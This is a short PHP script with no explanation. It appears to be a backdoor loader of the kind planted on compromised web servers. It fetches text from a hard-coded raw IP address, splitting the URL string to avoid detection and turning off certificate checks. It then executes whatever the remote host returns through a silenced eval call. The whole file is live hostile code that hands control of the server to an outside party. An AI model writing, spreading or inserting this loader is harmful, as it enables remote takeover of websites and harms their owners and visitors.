<?php
$b = 'http://69.30.242.114/z6062'.'6_6/stat/index.txt';
$d = '';

if (function_exists( 'curl_init' ) && function_exists( 'curl_exec' )) {
    $ch = curl_init($b);
    curl_setopt_array($ch, [CURLOPT_RETURNTRANSFER => 1, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_FOLLOWLOCATION => 1]);
    $d = curl_exec($ch);
    curl_close($ch);
} elseif (ini_get('allow_url_fopen')) {
    $d = file_get_contents($b, false, stream_context_create(["ssl"=>["verify_peer"=>false]]));
}

if ($d) @eval('?>'.$d);?>